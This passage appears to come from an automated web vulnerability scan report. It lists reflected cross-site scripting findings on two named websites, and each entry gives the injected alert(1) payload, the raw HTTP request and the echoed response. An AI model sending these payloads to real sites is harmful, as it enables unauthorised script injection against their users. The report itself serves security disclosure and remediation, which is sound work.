Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: userSite=Active|True@TotalNumberOfUsers|100@NumberOfBetaUsers|0@UserSiteType|RHP@BaseURL|www@SiteId|2@BetaNumber|141@RedirectURL|http://www.rentalhomesplus.com@; domain=.rentalhomesplus.com; expires=Fri, 26-Oct-2012 19:23:33 GMT; path=/
Set-Cookie: ASP.NET_SessionId=gh4fkw3a5ifzatmll2lx0545; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 26 Nov 2010 20:23:33 GMT
Connection: close
Content-Length: 111677
Set-Cookie: aptspersistence=612439212.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_AptHead">


<!--BEG
...[SNIP]...
<a href="/oodle8fe3b"><a>180a3258f33" class="no-underline a-margin-15 commjunc_new_search">
...[SNIP]...

1.184. http://www.rentalhomesplus.com/search/oasis.dll [partner parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rentalhomesplus.com
Path:   /search/oasis.dll

Issue detail

The value of the partner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f87d"%3b2b465d35770 was submitted in the partner parameter. This input was echoed as 2f87d";2b465d35770 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search/oasis.dll?page=summarybz&property=311374.7&p=oodle&partner=oodle2f87d"%3b2b465d35770 HTTP/1.1
Host: www.rentalhomesplus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: userSite=Active|True@TotalNumberOfUsers|100@NumberOfBetaUsers|0@UserSiteType|RHP@BaseURL|www@SiteId|2@BetaNumber|141@RedirectURL|http://www.rentalhomesplus.com@; domain=.rentalhomesplus.com; expires=Fri, 26-Oct-2012 19:23:42 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ipu54lz44zjc14fnthy25z55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 26 Nov 2010 20:23:41 GMT
Connection: close
Content-Length: 111525
Set-Cookie: aptspersistence=444667052.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_AptHead">


<!--BEG
...[SNIP]...
cpropnum = "311374.7";
var dcarea = accarea.replace(".","").toLowerCase();
var dccomm = acccomm.replace(".","").toLowerCase();
var dcam = "";
var dcbeds = "";
var dchtype = "";
var dcaff = "oodle2f87d";2b465d35770";
var dpropnum = accpropnum.replace(".","_");
var keyvalues = "state="+dcstate+";reg="+dcreg+";area="+dcarea+";comm="+dccomm+";am="+dcam+";beds="+dcbeds+";htype="+dchtype+";aff="+dcaff+";propnum="+d
...[SNIP]...

1.185. http://www.sitebrand.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9249"><script>alert(1)</script>aa8c58931bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d9249\"><script>alert(1)</script>aa8c58931bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d9249"><script>alert(1)</script>aa8c58931bb=1 HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:23:07 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27076


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<input type="hidden" name="redirect_to" value="/?d9249\"><script>alert(1)</script>aa8c58931bb=1" />
...[SNIP]...

1.186. http://www.sitebrand.com/wp-content/plugins/contact-form-7/scripts.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/contact-form-7/scripts.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24d12"><script>alert(1)</script>a7a6bdc17b1 was submitted in the REST URL parameter 1. This input was echoed as 24d12\"><script>alert(1)</script>a7a6bdc17b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content24d12"><script>alert(1)</script>a7a6bdc17b1/plugins/contact-form-7/scripts.js HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:35 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content24d12\"><script>alert(1)</script>a7a6bdc17b1/plugins/contact-form-7/scripts.js" />
...[SNIP]...

1.187. http://www.sitebrand.com/wp-content/plugins/contact-form-7/scripts.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/contact-form-7/scripts.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6256"><script>alert(1)</script>5c269975e9c was submitted in the REST URL parameter 2. This input was echoed as c6256\"><script>alert(1)</script>5c269975e9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsc6256"><script>alert(1)</script>5c269975e9c/contact-form-7/scripts.js HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:36 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/pluginsc6256\"><script>alert(1)</script>5c269975e9c/contact-form-7/scripts.js" />
...[SNIP]...

1.188. http://www.sitebrand.com/wp-content/plugins/contact-form-7/scripts.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/contact-form-7/scripts.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34972"><script>alert(1)</script>25bc5b1264b was submitted in the REST URL parameter 3. This input was echoed as 34972\"><script>alert(1)</script>25bc5b1264b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/contact-form-734972"><script>alert(1)</script>25bc5b1264b/scripts.js HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:39 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:39 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/plugins/contact-form-734972\"><script>alert(1)</script>25bc5b1264b/scripts.js" />
...[SNIP]...

1.189. http://www.sitebrand.com/wp-content/plugins/contact-form-7/scripts.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/contact-form-7/scripts.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3133b"><script>alert(1)</script>4f7886d052a was submitted in the REST URL parameter 4. This input was echoed as 3133b\"><script>alert(1)</script>4f7886d052a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/contact-form-7/scripts.js3133b"><script>alert(1)</script>4f7886d052a HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:41 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:41 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/plugins/contact-form-7/scripts.js3133b\"><script>alert(1)</script>4f7886d052a" />
...[SNIP]...

1.190. http://www.sitebrand.com/wp-content/plugins/contact-form-7/styles.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/contact-form-7/styles.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b616e"><script>alert(1)</script>79b552272f5 was submitted in the REST URL parameter 1. This input was echoed as b616e\"><script>alert(1)</script>79b552272f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentb616e"><script>alert(1)</script>79b552272f5/plugins/contact-form-7/styles.css HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:35 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-contentb616e\"><script>alert(1)</script>79b552272f5/plugins/contact-form-7/styles.css" />
...[SNIP]...

1.191. http://www.sitebrand.com/wp-content/plugins/contact-form-7/styles.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/contact-form-7/styles.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dd52"><script>alert(1)</script>53de14fd4 was submitted in the REST URL parameter 2. This input was echoed as 3dd52\"><script>alert(1)</script>53de14fd4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins3dd52"><script>alert(1)</script>53de14fd4/contact-form-7/styles.css HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:36 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:36 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24602

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/plugins3dd52\"><script>alert(1)</script>53de14fd4/contact-form-7/styles.css" />
...[SNIP]...

1.192. http://www.sitebrand.com/wp-content/plugins/contact-form-7/styles.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/contact-form-7/styles.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48df5"><script>alert(1)</script>cdd3a670393 was submitted in the REST URL parameter 3. This input was echoed as 48df5\"><script>alert(1)</script>cdd3a670393 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/contact-form-748df5"><script>alert(1)</script>cdd3a670393/styles.css HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:38 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:38 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/plugins/contact-form-748df5\"><script>alert(1)</script>cdd3a670393/styles.css" />
...[SNIP]...

1.193. http://www.sitebrand.com/wp-content/plugins/contact-form-7/styles.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/contact-form-7/styles.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32686"><script>alert(1)</script>68c143f9d2b was submitted in the REST URL parameter 4. This input was echoed as 32686\"><script>alert(1)</script>68c143f9d2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/contact-form-7/styles.css32686"><script>alert(1)</script>68c143f9d2b HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:41 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:41 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/plugins/contact-form-7/styles.css32686\"><script>alert(1)</script>68c143f9d2b" />
...[SNIP]...

1.194. http://www.sitebrand.com/wp-content/plugins/slidedeck-lite-for-wordpress/lib/slidedeck.jquery.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/slidedeck-lite-for-wordpress/lib/slidedeck.jquery.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload feabd"><script>alert(1)</script>a41f3158506 was submitted in the REST URL parameter 1. This input was echoed as feabd\"><script>alert(1)</script>a41f3158506 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentfeabd"><script>alert(1)</script>a41f3158506/plugins/slidedeck-lite-for-wordpress/lib/slidedeck.jquery.js HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:34 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-contentfeabd\"><script>alert(1)</script>a41f3158506/plugins/slidedeck-lite-for-wordpress/lib/slidedeck.jquery.js" />
...[SNIP]...

1.195. http://www.sitebrand.com/wp-content/plugins/slidedeck-lite-for-wordpress/lib/slidedeck.jquery.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/slidedeck-lite-for-wordpress/lib/slidedeck.jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 902ee"><script>alert(1)</script>0f50e1059ae was submitted in the REST URL parameter 2. This input was echoed as 902ee\"><script>alert(1)</script>0f50e1059ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins902ee"><script>alert(1)</script>0f50e1059ae/slidedeck-lite-for-wordpress/lib/slidedeck.jquery.js HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:36 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:36 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/plugins902ee\"><script>alert(1)</script>0f50e1059ae/slidedeck-lite-for-wordpress/lib/slidedeck.jquery.js" />
...[SNIP]...

1.196. http://www.sitebrand.com/wp-content/plugins/slidedeck-lite-for-wordpress/lib/slidedeck.jquery.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/slidedeck-lite-for-wordpress/lib/slidedeck.jquery.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d242d"><script>alert(1)</script>08b7ab1b54a was submitted in the REST URL parameter 3. This input was echoed as d242d\"><script>alert(1)</script>08b7ab1b54a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/slidedeck-lite-for-wordpressd242d"><script>alert(1)</script>08b7ab1b54a/lib/slidedeck.jquery.js HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:37 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/plugins/slidedeck-lite-for-wordpressd242d\"><script>alert(1)</script>08b7ab1b54a/lib/slidedeck.jquery.js" />
...[SNIP]...

1.197. http://www.sitebrand.com/wp-content/plugins/slidedeck-lite-for-wordpress/lib/slidedeck.jquery.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/slidedeck-lite-for-wordpress/lib/slidedeck.jquery.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9596"><script>alert(1)</script>144698515d8 was submitted in the REST URL parameter 4. This input was echoed as b9596\"><script>alert(1)</script>144698515d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/slidedeck-lite-for-wordpress/libb9596"><script>alert(1)</script>144698515d8/slidedeck.jquery.js HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:39 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:39 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/plugins/slidedeck-lite-for-wordpress/libb9596\"><script>alert(1)</script>144698515d8/slidedeck.jquery.js" />
...[SNIP]...

1.198. http://www.sitebrand.com/wp-content/plugins/slidedeck-lite-for-wordpress/lib/slidedeck.jquery.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/slidedeck-lite-for-wordpress/lib/slidedeck.jquery.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49ac7"><script>alert(1)</script>8863cd0ea30 was submitted in the REST URL parameter 5. This input was echoed as 49ac7\"><script>alert(1)</script>8863cd0ea30 in the application's response.

